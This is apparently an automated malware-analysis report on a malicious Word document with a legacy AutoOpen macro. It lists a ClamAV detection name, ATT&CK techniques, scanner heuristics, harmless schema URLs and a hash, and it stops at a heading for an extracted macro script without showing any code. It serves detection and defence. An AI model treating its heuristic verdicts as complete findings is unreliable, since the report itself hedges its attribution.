MALICIOUS (Risk Score: 142)
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The file is a malicious Office document containing a legacy WordBasic AutoOpen macro, as indicated by multiple heuristics. The ClamAV detection name 'Doc.Malware.Sagent-6697295-0' suggests it is a known malware variant. The macro's purpose is to execute malicious code, likely leading to further compromise, consistent with a phishing attachment.
Heuristics 5
- ClamAV: Doc.Malware.Sagent-6697295-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Sagent-6697295-0
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URLs, each found in document text (OLE body):
  - http://schemas.openxmlformats.org/drawingml/2006/main
  - http://schemas.openxmlformats.org/officeDocument/2006/bibliography
  - http://schemas.openxmlformats.org/officeDocument/2006/customXml
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 67039 bytes |

SHA-256: 3bba2f1fe5cd7a50323184236fdc3930947e0517e4480a3457a7d062a56db828
Preview script: first 1,000 lines of the extracted script